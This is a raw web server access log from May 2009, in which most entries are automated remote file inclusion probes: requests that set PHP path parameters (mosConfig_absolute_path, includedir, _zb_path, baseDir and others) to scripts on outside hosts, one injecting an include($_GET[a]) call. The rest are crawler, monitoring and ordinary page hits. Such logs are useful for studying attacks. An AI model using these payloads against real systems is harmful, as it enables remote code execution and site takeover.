217.147.29.190 - - [19/May/2009:02:03:57 -0400] "GET /logs/access_log.Q108072000%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:04:00 -0400] "GET /logs/access_log.Q108070500%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:04:28 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:04:29 -0400] "GET /logs/access_log.Q108051700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:04:31 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:04:32 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:02:04:33 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:02:04:38 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:02:04:39 -0400] "GET /logs/access_log.Q108121000%20%20//tools/send_reminders.php?noSet=0&includedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:04:55 -0400] "GET ///?_zb_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:04:55 -0400] "GET /logs///?_zb_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 200 1960 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:04:55 -0400] "GET /logs/access_log.Q108090900///?_zb_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:05:04 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:05:04 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:05:04 -0400] "GET /logs/access_log.Q108052400//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:05:05 -0400] "GET /logs/access_log.Q108051700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:05:08 -0400] "GET ///?_zb_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:05:08 -0400] "GET /logs///?_zb_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 200 1960 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:05:08 -0400] "GET /logs/access_log.Q108090900///?_zb_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:02:05:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.79.49 - - [19/May/2009:02:05:37 -0400] "GET /logs/error_log.Q109050900 HTTP/1.0" 200 4206283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [19/May/2009:02:05:42 -0400] "GET /logs/error_log.Q109050900 HTTP/1.0" 200 4206283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [19/May/2009:02:06:41 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 4525198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.98.59.178 - - [19/May/2009:02:06:58 -0400] "GET /logs/access_log.Q108090900%20%20///?_zb_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:07:09 -0400] "GET /logs/access_log.Q108052400%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.79.49 - - [19/May/2009:02:06:43 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 4525198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.29.190 - - [19/May/2009:02:07:12 -0400] "GET /logs/access_log.Q108051700%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:07:19 -0400] "GET /logs/access_log.Q108090900%20%20///?_zb_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.59.148.76 - - [19/May/2009:02:07:31 -0400] "GET /logs/access_log.Q108100900/skin/zero_vote/ask_password.php?dir=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:02:07:31 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:02:07:31 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:02:07:40 -0400] "GET /logs/access_log.Q108100900/skin/zero_vote/ask_password.php?dir=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:02:07:41 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.69"
69.59.148.76 - - [19/May/2009:02:07:41 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
217.147.29.190 - - [19/May/2009:02:07:42 -0400] "GET /logs/access_log.Q108052400%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:07:42 -0400] "GET /logs/access_log.Q108051700%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.181.7.93 - - [19/May/2009:02:08:22 -0400] "GET /logs/access_log.Q108092000 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.115.89.68 - - [19/May/2009:02:08:32 -0400] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:02:08:32 -0400] "GET /logs/error_log.Q109042000%20%20//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:02:08:32 -0400] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:02:08:39 -0400] "GET /logs/access_log.Q109050800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:02:08:41 -0400] "GET /logs/error_log.Q109042000%20%20//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:02:08:41 -0400] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:02:08:41 -0400] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:02:08:53 -0400] "GET /logs/access_log.Q109021400%20%20//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.94.30.156 - - [19/May/2009:02:08:58 -0400] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//flash/ck.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
211.115.89.68 - - [19/May/2009:02:09:08 -0400] "GET /logs/access_log.Q109021400%20%20//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
205.188.117.69 - - [19/May/2009:02:09:25 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
205.188.116.80 - - [19/May/2009:02:09:25 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
211.115.89.68 - - [19/May/2009:02:09:25 -0400] "GET /logs/access_log.Q109021400//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:02:09:25 -0400] "GET /logs/error_log.Q109042000//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
205.188.116.138 - - [19/May/2009:02:09:25 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
205.188.116.142 - - [19/May/2009:02:09:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
211.115.89.68 - - [19/May/2009:02:09:33 -0400] "GET /logs/access_log.Q109021400//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:02:09:33 -0400] "GET /logs/error_log.Q109042000//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:09:50 -0400] "GET /logs/access_log.Q108072000%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:09:53 -0400] "GET /logs/access_log.Q108070500%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:02:09:56 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:02:10:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.59.178 - - [19/May/2009:02:10:37 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:10:37 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:10:37 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:10:40 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:10:40 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:10:41 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.249.72.114 - - [19/May/2009:02:10:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L002981419F009600813C091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [19/May/2009:02:11:07 -0400] "GET /logs/error_log.Q108092100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.64.15 - - [19/May/2009:02:11:15 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.94.30.156 - - [19/May/2009:02:11:17 -0400] "GET /logs/error_log.Q109042900//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//flash/ck.gif??? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
69.94.30.156 - - [19/May/2009:02:11:17 -0400] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//flash/ck.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
69.94.30.156 - - [19/May/2009:02:11:17 -0400] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//flash/ck.gif??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
200.93.147.154 - - [19/May/2009:02:11:27 -0400] "GET /logs/access_log.Q108090900%20%20///?_zb_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:11:30 -0400] "GET /logs/access_log.Q108090900%20%20///?_zb_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.30.79.49 - - [19/May/2009:02:11:06 -0400] "GET /logs/access_log.Q109051400 HTTP/1.0" 200 6017281 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.98.59.178 - - [19/May/2009:02:11:49 -0400] "GET /logs/error_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:11:57 -0400] "GET /logs/error_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.94.30.156 - - [19/May/2009:02:12:03 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//flash/ck.gif??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
91.121.210.42 - - [19/May/2009:02:12:12 -0400] "GET /logs/access_log.Q109030800//tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:02:12:12 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:02:12:12 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:02:12:22 -0400] "GET /logs/access_log.Q108121200//tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.30.79.49 - - [19/May/2009:02:12:32 -0400] "GET /logs/error_log.Q109051900 HTTP/1.0" 200 200439 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [19/May/2009:02:12:33 -0400] "GET /logs/error_log.Q109051900 HTTP/1.0" 200 200439 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.29.190 - - [19/May/2009:02:12:43 -0400] "GET /logs/access_log.Q108082100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:02:13:10 -0400] "GET /logs/access_log.Q109012300%20%20//tools/send_reminders.php?noSet=0&includedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.125.64.49 - - [19/May/2009:02:13:51 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
91.121.210.42 - - [19/May/2009:02:14:16 -0400] "GET /logs/access_log.Q109030800%20%20//tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:02:14:23 -0400] "GET /logs/access_log.Q108121200%20%20//tools/send_reminders.php?noSet=0&includedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:14:32 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:14:32 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:14:32 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:14:53 -0400] "GET /logs/access_log.Q108082100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:15:02 -0400] "GET /logs/error_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:15:31 -0400] "GET /logs/errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:15:31 -0400] "GET /logs/access_log.Q108061000/errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:15:31 -0400] "GET /errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:02:15:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.143.109.236 - - [19/May/2009:02:15:37 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.125.64.51 - - [19/May/2009:02:16:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
217.147.29.190 - - [19/May/2009:02:17:08 -0400] "GET /logs/access_log.Q108110900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:17:08 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:17:08 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:17:08 -0400] "GET /logs/access_log.Q108120600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:17:14 -0400] "GET /logs/access_log.Q109051100%20%20//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:17:25 -0400] "GET /logs/access_log.Q109051100%20%20//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:17:46 -0400] "GET /logs/access_log.Q108061000%20%20/errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:17:47 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:17:50 -0400] "GET /logs/error_log.Q109051100%20%20//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:17:51 -0400] "GET /logs/error_log.Q109051100%20%20//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:19:16 -0400] "GET /logs/access_log.Q109051100%20%20//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:19:28 -0400] "GET /logs/error_log.Q109051100%20%20//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:02:19:45 -0400] "GET /logs/access_log.Q108102400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B//&w=include($_GET[a]);&a=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:02:19:47 -0400] "GET /logs/access_log.Q108090200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B//&w=include($_GET[a]);&a=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:02:20:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.128.135.52 - - [19/May/2009:02:23:40 -0400] "GET /logs/error_log.Q109050400/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/May/2009:02:23:40 -0400] "GET /index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/May/2009:02:23:40 -0400] "GET /logs/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
72.52.230.168 - - [19/May/2009:02:24:59 -0400] "GET /logs//includes/db_adodb.php?baseDir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:24:59 -0400] "GET //includes/db_adodb.php?baseDir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:24:59 -0400] "GET /logs/access_log.Q108051500//includes/db_adodb.php?baseDir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:25:24 -0400] "GET /logs/access_log.Q108102400/errors.php?error=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:02:25:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.103.144 - - [19/May/2009:02:25:34 -0400] "GET //includes/db_adodb.php?baseDir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:02:25:34 -0400] "GET /logs/access_log.Q108051500//includes/db_adodb.php?baseDir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:02:25:34 -0400] "GET /logs//includes/db_adodb.php?baseDir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
